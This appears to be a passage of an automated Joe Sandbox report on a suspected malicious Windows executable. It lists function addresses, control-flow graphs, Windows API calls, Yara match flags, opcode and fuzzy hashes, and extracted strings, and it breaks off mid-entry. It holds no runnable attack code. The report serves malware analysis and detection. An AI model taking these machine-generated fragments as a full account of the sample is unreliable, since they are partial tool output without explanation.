                                            • Opcode ID: 52929fb7d35d7b340b3713fda41224da8122b9a10d728832a0caabdc2f9b3651
                                            • Instruction ID: 673894bbe529e171f790d670c2fae652baaff4485569ff70b1b04ba6d1552cfb
                                            • Opcode Fuzzy Hash: 52929fb7d35d7b340b3713fda41224da8122b9a10d728832a0caabdc2f9b3651
                                            • Instruction Fuzzy Hash: DB61C6B1A00208ABEB04DBA4DD89FDE7775BF05304F10413AF105B72D1DB79AA94CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1995 413670-41368b GetFileInformationByHandle 1996 41369a-4136f0 1995->1996 1997 41368d-413699 1995->1997 1998 413703-413711 GetFileSize 1996->1998 1999 4136f2-413701 1996->1999 2000 4137b3-4137b9 1998->2000 2001 413717-413763 SetFilePointer ReadFile SetFilePointer ReadFile 1998->2001 1999->1998 2003 4137bb 2000->2003 2004 4137bd-4137c3 2000->2004 2001->2000 2002 413765-41376e 2001->2002 2002->2000 2007 413770-413796 SetFilePointer ReadFile 2002->2007 2003->2004 2005 4137c5 2004->2005 2006 4137c7-4137d5 2004->2006 2005->2006 2008 413847-41384d 2006->2008 2009 4137d7-413844 call 432fb0 * 3 2006->2009 2010 413798-41379d 2007->2010 2011 4137ad 2007->2011 2013 4138b1-4138ba 2008->2013 2014 41384f-4138af FileTimeToSystemTime 2008->2014 2009->2008 2010->2011 2015 41379f-4137a4 2010->2015 2011->2000 2014->2013 2015->2011 2017 4137a6-4137ab 2015->2017 2017->2000 2017->2011
                                            APIs
                                            • GetFileInformationByHandle.KERNEL32(?,?,?,00000003,73BCFBD0,00000073), ref: 00413683
                                            • GetFileSize.KERNEL32(?,00000000), ref: 00413706
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00413724
                                            • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00413735
                                            • SetFilePointer.KERNELBASE(?,00000024,00000000,00000000), ref: 00413742
                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00413753
                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00413776
                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00413787
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$PointerRead$HandleInformationSize
                                            • String ID:
                                            • API String ID: 2979504256-0
                                            • Opcode ID: 61f9b29862b34706fbaf0c84bfd94dc2d6485c59ef157a9d25be3348fb26b658
                                            • Instruction ID: 42c9301b02b59833fe73ebc2971b27293901998bbd8a8571cf27d89f62cdcd71
                                            • Opcode Fuzzy Hash: 61f9b29862b34706fbaf0c84bfd94dc2d6485c59ef157a9d25be3348fb26b658
                                            • Instruction Fuzzy Hash: 40618DB16047046FE328CE28CC91B6BB7E8EBC4704F45492EFA56D7380D678ED448B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2022 42fac3-42faf3 call 42f89f 2025 42faf5-42fb00 call 4229c7 2022->2025 2026 42fb0e-42fb1a call 42c737 2022->2026 2033 42fb02-42fb09 call 4229da 2025->2033 2031 42fb33-42fb7c call 42f80a 2026->2031 2032 42fb1c-42fb31 call 4229c7 call 4229da 2026->2032 2041 42fbe9-42fbf2 GetFileType 2031->2041 2042 42fb7e-42fb87 2031->2042 2032->2033 2043 42fde8-42fdec 2033->2043 2044 42fbf4-42fc25 GetLastError call 4229a4 CloseHandle 2041->2044 2045 42fc3b-42fc3e 2041->2045 2047 42fb89-42fb8d 2042->2047 2048 42fbbe-42fbe4 GetLastError call 4229a4 2042->2048 2044->2033 2059 42fc2b-42fc36 call 4229da 2044->2059 2050 42fc40-42fc45 2045->2050 2051 42fc47-42fc4d 2045->2051 2047->2048 2052 42fb8f-42fbbc call 42f80a 2047->2052 2048->2033 2056 42fc51-42fc9f call 42c682 2050->2056 2051->2056 2057 42fc4f 2051->2057 2052->2041 2052->2048 2065 42fca1-42fca3 call 42fa19 2056->2065 2066 42fcbe-42fcd8 call 42f5b7 2056->2066 2057->2056 2059->2033 2069 42fca8-42fcad 2065->2069 2070 42fcdd-42fce6 2066->2070 2069->2066 2071 42fcaf 2069->2071 2072 42fceb-42fd2c 2070->2072 2073 42fce8-42fce9 2070->2073 2074 42fcb1-42fcb9 call 424d2b 2071->2074 2075 42fd2e-42fd32 2072->2075 2076 42fd4d-42fd5b 2072->2076 2073->2074 2074->2043 2075->2076 2078 42fd34-42fd48 2075->2078 2079 42fd61-42fd65 2076->2079 2080 42fde6 2076->2080 2078->2076 2079->2080 2082 42fd67-42fd9a CloseHandle call 42f80a 2079->2082 2080->2043 2085 42fdce-42fde2 2082->2085 2086 42fd9c-42fdc8 GetLastError call 4229a4 call 42c84a 2082->2086 2085->2080 2086->2085
                                            APIs
                                              • Part of subcall function 0042F80A: CreateFileW.KERNEL32(00000000,00000000,?,0042FB6C,?,?,00000000,?,0042FB6C,00000000,0000000C), ref: 0042F827
                                            • GetLastError.KERNEL32 ref: 0042FBD7
                                            • __dosmaperr.LIBCMT ref: 0042FBDE
                                            • GetFileType.KERNEL32(00000000), ref: 0042FBEA
                                            • GetLastError.KERNEL32 ref: 0042FBF4
                                            • __dosmaperr.LIBCMT ref: 0042FBFD
                                            • CloseHandle.KERNEL32(00000000), ref: 0042FC1D
                                            • CloseHandle.KERNEL32(00000000), ref: 0042FD6A
                                            • GetLastError.KERNEL32 ref: 0042FD9C
                                            • __dosmaperr.LIBCMT ref: 0042FDA3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                            • String ID: H
                                            • API String ID: 4237864984-2852464175
                                            • Opcode ID: ab4a2fa7039de01f88b924d2acb9f6bfc6cd6c794438e29297dbe0d97afc0de4
                                            • Instruction ID: 25dcac02debeb81dbd6a6d198667d1cc5539ba691dcfbe9b2468b110224c6869
                                            • Opcode Fuzzy Hash: ab4a2fa7039de01f88b924d2acb9f6bfc6cd6c794438e29297dbe0d97afc0de4
                                            • Instruction Fuzzy Hash: 27A13732B141289FCF199F68EC517AE7BB0AF06318F94017EE801AF391C739991AC759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2402 428d30-428d40 2403 428d42-428d55 call 4229c7 call 4229da 2402->2403 2404 428d5a-428d5c 2402->2404 2420 4290d9 2403->2420 2406 428d62-428d68 2404->2406 2407 4290c1-4290ce call 4229c7 call 4229da 2404->2407 2406->2407 2410 428d6e-428d94 2406->2410 2425 4290d4 call 41d389 2407->2425 2410->2407 2413 428d9a-428da3 2410->2413 2416 428da5-428db8 call 4229c7 call 4229da 2413->2416 2417 428dbd-428dbf 2413->2417 2416->2425 2418 428dc5-428dc8 2417->2418 2419 4290bd-4290bf 2417->2419 2418->2419 2423 428dce-428dd2 2418->2423 2424 4290dc-4290df 2419->2424 2420->2424 2423->2416 2427 428dd4-428deb 2423->2427 2425->2420 2430 428e3c-428e42 2427->2430 2431 428ded-428df0 2427->2431 2433 428e44-428e4e 2430->2433 2434 428e08-428e1f call 4229c7 call 4229da call 41d389 2430->2434 2435 428df2-428dfb 2431->2435 2436 428e00-428e06 2431->2436 2437 428e50-428e52 2433->2437 2438 428e55-428e73 call 425373 call 424bd8 * 2 2433->2438 2469 428ff4 2434->2469 2439 428ec0-428ed0 2435->2439 2436->2434 2440 428e24-428e37 2436->2440 2437->2438 2473 428e90-428eb9 call 4286fd 2438->2473 2474 428e75-428e8b call 4229da call 4229c7 2438->2474 2442 428ed6-428ee2 2439->2442 2443 428f95-428f9e call 42ee3b 2439->2443 2440->2439 2442->2443 2446 428ee8-428eea 2442->2446 2457 428fa0-428fb2 2443->2457 2458 429011 2443->2458 2446->2443 2450 428ef0-428f14 2446->2450 2450->2443 2454 428f16-428f2c 2450->2454 2454->2443 2459 428f2e-428f30 2454->2459 2457->2458 2463 428fb4-428fc3 GetConsoleMode 2457->2463 2461 429015-42902d ReadFile 2458->2461 2459->2443 2465 428f32-428f58 2459->2465 2467 429089-429094 GetLastError 2461->2467 2468 42902f-429035 2461->2468 2463->2458 2464 428fc5-428fc9 2463->2464 2464->2461 2470 428fcb-428fe5 ReadConsoleW 2464->2470 2465->2443 2472 428f5a-428f70 2465->2472 2475 429096-4290a8 call 4229da call 4229c7 2467->2475 2476 4290ad-4290b0 2467->2476 2468->2467 2477 429037 2468->2477 2471 428ff7-429001 call 424bd8 2469->2471 2478 429006-42900f 2470->2478 2479 428fe7 GetLastError 2470->2479 2471->2424 2472->2443 2483 428f72-428f74 2472->2483 2473->2439 2474->2469 2475->2469 2480 4290b6-4290b8 2476->2480 2481 428fed-428ff3 call 4229a4 2476->2481 2487 42903a-42904c 2477->2487 2478->2487 2479->2481 2480->2471 2481->2469 2483->2443 2492 428f76-428f90 2483->2492 2487->2471 2489 42904e-429052 2487->2489 2496 429054-429064 call 428a4a 2489->2496 2497 42906b-429076 2489->2497 2492->2443 2508 429067-429069 2496->2508 2502 429082-429087 call 428879 2497->2502 2503 429078 call 428ba1 2497->2503 2509 42907d-429080 2502->2509 2503->2509 2508->2471 2509->2508
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f19e9a0dcaf4542840d3d190d8256635f9601c5f96d698ed50c24fdf52c4dac5
                                            • Instruction ID: 58b0fd4a9d56e6ef3f430f92bc8ab8c2edc3e5391ccf52cd0c66086c8b9a9c5e
                                            • Opcode Fuzzy Hash: f19e9a0dcaf4542840d3d190d8256635f9601c5f96d698ed50c24fdf52c4dac5
                                            • Instruction Fuzzy Hash: 5CC1E4B0B04229AFDF15DF99E940BAEBBB1AF49304F44405EE5049B392CB799D41CB2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • __allrem.LIBCMT ref: 0041F2BF
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F2DB
                                            • __allrem.LIBCMT ref: 0041F2F2
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F310
                                            • __allrem.LIBCMT ref: 0041F327
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F345
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 1992179935-0
                                            • Opcode ID: afe13e7a46b6ef11c01009a8e5668f2afd255309c39c946028f577abb9d276b4
                                            • Instruction ID: d0314f91818ed0267d4fd51c4fbfc945a5535070cb91a0e9f51d4e5c0fe62911
                                            • Opcode Fuzzy Hash: afe13e7a46b6ef11c01009a8e5668f2afd255309c39c946028f577abb9d276b4
                                            • Instruction Fuzzy Hash: CA811972700716ABE720AE69DC41B9B73A8AF44324F14423FF815D6381EB78DD86879D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00437808), ref: 00429FBC
                                            • _free.LIBCMT ref: 00429FAA
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            • _free.LIBCMT ref: 0042A176
                                            Strings
                                            • W. Europe Standard Time, xrefs: 0042A02B
                                            • W. Europe Daylight Time, xrefs: 0042A05A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                            • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                            • API String ID: 2155170405-986674615
                                            • Opcode ID: 837c5badca52079ec0e96daf541c87dc0ef9436bda13a7ae4c3dc574fe641105
                                            • Instruction ID: 187fe060aa1e8d20f7c285edf778d9c31c5832d5f6b45f70cdd0d571444a2247
                                            • Opcode Fuzzy Hash: 837c5badca52079ec0e96daf541c87dc0ef9436bda13a7ae4c3dc574fe641105
                                            • Instruction Fuzzy Hash: 4B5139B1A00225ABCB10EF66EC419AB77B8EF45724F90026FE814D3291E7389E51DB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 0042866B
                                            • GetLastError.KERNEL32(?,?,?), ref: 00428675
                                            • __dosmaperr.LIBCMT ref: 0042867C
                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?), ref: 0042869A
                                            • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 004286C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FilePointer$ErrorLast__dosmaperr
                                            • String ID:
                                            • API String ID: 1114809156-0
                                            • Opcode ID: a521d9f6742f3aa34d8bfcce81540817ec3c156cb2d6ad036f264ceac9dbabdf
                                            • Instruction ID: c2bc2b43e9e0479d0445dc68446aaf02f36d205810b47e9c5fd17d7b8eea3b8e
                                            • Opcode Fuzzy Hash: a521d9f6742f3aa34d8bfcce81540817ec3c156cb2d6ad036f264ceac9dbabdf
                                            • Instruction Fuzzy Hash: 3A018071A01128BBCF109FA5DC089EF7F79EF45764F50815AF824921A0DB748940DBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00426DA5: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00426DED
                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,f!@,?,?,?,?,?,?,?), ref: 00427761
                                            • GetLastError.KERNEL32 ref: 0042776B
                                            • __dosmaperr.LIBCMT ref: 004277B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                            • String ID:
                                            • API String ID: 251514795-0
                                            • Opcode ID: e9298722f791c8e300b6e4d570100bb42cc1ecd925c3c94bca1732c60efa96f6
                                            • Instruction ID: 6189e57fbb4c9ae1907a91c154d3bdfe7dd40b0cdefc24b2e94fcbcc77c2c63b
                                            • Opcode Fuzzy Hash: e9298722f791c8e300b6e4d570100bb42cc1ecd925c3c94bca1732c60efa96f6
                                            • Instruction Fuzzy Hash: 6251F571B0822AABDB10DFA9EC81FEFBBB8EF45314F940057E400A7251D678A941C769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 892d29c50a969a5db017f52e26b5cfadb566b14b83aaed2a0d3c3de2b0ca430a
                                            • Instruction ID: bd4005785fc9dca87dab10419669b9a423434038f5e1b53740f9e95500615ff8
                                            • Opcode Fuzzy Hash: 892d29c50a969a5db017f52e26b5cfadb566b14b83aaed2a0d3c3de2b0ca430a
                                            • Instruction Fuzzy Hash: 0F21B1B4200B019BEB30AF69E904797B7F8BF85705F04442EE98597790D7BDE884CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _free.LIBCMT ref: 0042A120
                                            • _free.LIBCMT ref: 0042A176
                                              • Part of subcall function 00429F52: _free.LIBCMT ref: 00429FAA
                                              • Part of subcall function 00429F52: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00437808), ref: 00429FBC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$InformationTimeZone
                                            • String ID:
                                            • API String ID: 597776487-0
                                            • Opcode ID: 9fa3b6bd56bcebca6133c709ace5de1d6669b6461d28ef68dd2226c870d8b583
                                            • Instruction ID: 45cf62bc884d15c2c0a88a936c9aed1d857d16d728b95280dfeca9c4df0279c5
                                            • Opcode Fuzzy Hash: 9fa3b6bd56bcebca6133c709ace5de1d6669b6461d28ef68dd2226c870d8b583
                                            • Instruction Fuzzy Hash: 51212C72A0023457CB31A735AC41AFB7768CF45774F91039BFC94A2180DB789DA1859D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,00000001,?,00424C59,00000001,00440BF8,0000000C,00424D0B,00000000), ref: 00424D81
                                            • GetLastError.KERNEL32(?,00424C59,00000001,00440BF8,0000000C,00424D0B,00000000), ref: 00424D8B
                                            • __dosmaperr.LIBCMT ref: 00424DB6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                            • String ID:
                                            • API String ID: 490808831-0
                                            • Opcode ID: f5aaae65f62a1d01c280413904a2b3a292bf0e65c5b21665d18ac0ba5820f9a4
                                            • Instruction ID: cf6fecfc172579e245fbc089cf7535c755e8b7aec302f0c5f833c65d4f2fd194
                                            • Opcode Fuzzy Hash: f5aaae65f62a1d01c280413904a2b3a292bf0e65c5b21665d18ac0ba5820f9a4
                                            • Instruction Fuzzy Hash: 3F01263375413016D6252775B88977F674ACFC2B39FA5026FF814DB2D2DA6C8C81429D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetFilePointerEx.KERNEL32(00000000,?,00000002,00000000,00000000,?,00000000,?,?,?,00428713,00000000,?,00000002,00000000), ref: 00428612
                                            • GetLastError.KERNEL32(?,00428713,00000000,?,00000002,00000000,?,00427699,00000000,00000000,00000000,00000002,?,00000000,00000000,f!@), ref: 0042861C
                                            • __dosmaperr.LIBCMT ref: 00428623
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLastPointer__dosmaperr
                                            • String ID:
                                            • API String ID: 2336955059-0
                                            • Opcode ID: f5a94498c40215ac0ff3613faf8605a1c96022a0bf4522c1e8626f3b665c62c9
                                            • Instruction ID: eb3c294a95e674874e513fdcb742fe1e8bc9f71fec3bc1df61991faa30bdd700
                                            • Opcode Fuzzy Hash: f5a94498c40215ac0ff3613faf8605a1c96022a0bf4522c1e8626f3b665c62c9
                                            • Instruction Fuzzy Hash: 0F01F732710525BFCF159FA9EC059AE3B29EF86325B64420EF811DB2D0EE74DD418B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0042B8C1
                                            • _free.LIBCMT ref: 0042B8FA
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042B901
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free_free
                                            • String ID:
                                            • API String ID: 2716640707-0
                                            • Opcode ID: 5d7be9edb3ce8c665922d8726c8e17989f02d0503b0f132c07fc03fa579451c7
                                            • Instruction ID: a86557282dffd8078d4fc8eb4d360000b08f910171242b477acc9820827bb8b3
                                            • Opcode Fuzzy Hash: 5d7be9edb3ce8c665922d8726c8e17989f02d0503b0f132c07fc03fa579451c7
                                            • Instruction Fuzzy Hash: 15E02B37744E3226921132363C89EAF0B1DCFC27B57A5012BF42882281EF585C0201FD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00414C53
                                            Strings
                                            • F7hu3e88u8dw83ytskjgtxfkb9HJkwjdijWJ, xrefs: 00414BF5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: F7hu3e88u8dw83ytskjgtxfkb9HJkwjdijWJ
                                            • API String ID: 823142352-2733386146
                                            • Opcode ID: d40c6c6160221197c2edcf7d929eb591da28f556b5286438da0060ee1f063cd2
                                            • Instruction ID: f9c7e2d7843b14380df3a8aaa82790d69693ece0fb5a2b0611c17a93f1d9f99c
                                            • Opcode Fuzzy Hash: d40c6c6160221197c2edcf7d929eb591da28f556b5286438da0060ee1f063cd2
                                            • Instruction Fuzzy Hash: 07418EB05017409FE7308F15D809757BBF0BF41718F118A6EE5999BBC1E3BAE4888B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __cftof
                                            • String ID: f!@
                                            • API String ID: 1622813385-1230519027
                                            • Opcode ID: 11b0959a5c1825e24ff45d522ab410245ef670c5136a5528f041441a8d352b09
                                            • Instruction ID: 55d67722fdbbb44a91f54f996a132253f85e0b0de065ada2076dc141130299f8
                                            • Opcode Fuzzy Hash: 11b0959a5c1825e24ff45d522ab410245ef670c5136a5528f041441a8d352b09
                                            • Instruction Fuzzy Hash: D93126327001346ACB196B35BC4297E7768DE87B387E5421FF420AA1D1EE3CD8838648
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualProtect.KERNEL32(016BB61C,016C3BD0,00000040,?), ref: 004494E1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_448000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: @
                                            • API String ID: 544645111-2766056989
                                            • Opcode ID: 70111ec3d2be513c42b32507ca7103b3e668a1abea644ecffb375fddbece0862
                                            • Instruction ID: dfb499618e0e907b321165385a30e4022f6f12c65d80d580572653a55f174e65
                                            • Opcode Fuzzy Hash: 70111ec3d2be513c42b32507ca7103b3e668a1abea644ecffb375fddbece0862
                                            • Instruction Fuzzy Hash: E1214F28108BC09ED312C77CBD7867A3FB56326207FD846A8D09C5B2B7D6B99118C76D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SHFileOperationW.SHELL32(00000654), ref: 004031D2
                                            • Sleep.KERNEL32(00000004), ref: 004031DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileOperationSleep
                                            • String ID:
                                            • API String ID: 2384180321-0
                                            • Opcode ID: f746b3391fd1bf2cd28f22d5e5f924014e759b97af1b1b9a09e9a10a57efe134
                                            • Instruction ID: 503749f49511a8afcda0956dfd5a54d2c4b48143094f2c20a80699bc23a40190
                                            • Opcode Fuzzy Hash: f746b3391fd1bf2cd28f22d5e5f924014e759b97af1b1b9a09e9a10a57efe134
                                            • Instruction Fuzzy Hash: DE41E4B01043819BC724DF24C985B9FB7F5BFC4309F508A1DE58887295EB39E288CB5A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00427725,?,00000000,00000000,?,?,00000000), ref: 004273AD
                                            • GetLastError.KERNEL32(?,00427725,?,00000000,00000000,?,?,00000000,00000000,f!@,?,?,?,?,?,?), ref: 004273D3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID:
                                            • API String ID: 442123175-0
                                            • Opcode ID: bca6154416014b3a818265f899c9fa0d550aee66259bac30b92aa8ff594c38ff
                                            • Instruction ID: 785da2d35afd5fe3bf473d19b3202920e2ab7b212c0abf5ea69192dbd398e0a2
                                            • Opcode Fuzzy Hash: bca6154416014b3a818265f899c9fa0d550aee66259bac30b92aa8ff594c38ff
                                            • Instruction Fuzzy Hash: 4F21A231B042289BCB24CF19DD809EEB3F9EF49315F5445AAED09E7250D734DE81CA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,00427745,?,00000000,00000000,?,?,00000000), ref: 004272C4
                                            • GetLastError.KERNEL32(?,00427745,?,00000000,00000000,?,?,00000000,00000000,f!@,?,?,?,?,?,?), ref: 004272EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID:
                                            • API String ID: 442123175-0
                                            • Opcode ID: 5b97eedbd14d85000398893579e35539ad1e880a6e4a33145a871d83f955b2fe
                                            • Instruction ID: e789b379b24f38082f68ed5bf1a785663b83dc525726c0a10ec9f063bbff655a
                                            • Opcode Fuzzy Hash: 5b97eedbd14d85000398893579e35539ad1e880a6e4a33145a871d83f955b2fe
                                            • Instruction Fuzzy Hash: A921A034A00229DBCB19CF69DD80AEDB7B9EB4D305F5440AAE906D7211D6349E42CB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            • Opcode ID: 7e523f30212ca871ea59efae5cef7f5cdc355d3c65524451d040bf20baea22ae
                                            • Instruction ID: 7b4837cb07872001d1fe4437078ae5f4ed8b268f4654edfe8db0bbd554c14429
                                            • Opcode Fuzzy Hash: 7e523f30212ca871ea59efae5cef7f5cdc355d3c65524451d040bf20baea22ae
                                            • Instruction Fuzzy Hash: 95110AF0D4434467E311EF255C86F5B3A9D9B85708F04043EFD45A3382EA7DE94882AB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Gdip$DisposeFreeImage
                                            • String ID:
                                            • API String ID: 1950503971-0
                                            • Opcode ID: 1ebad81db86a079ca83848a38f407bfd413141559dbed38acdb0258a5ef6856a
                                            • Instruction ID: a593295bd730f55fa88b79d9a7d081ec5e2d597b060236e4f6f043a62d27f7b7
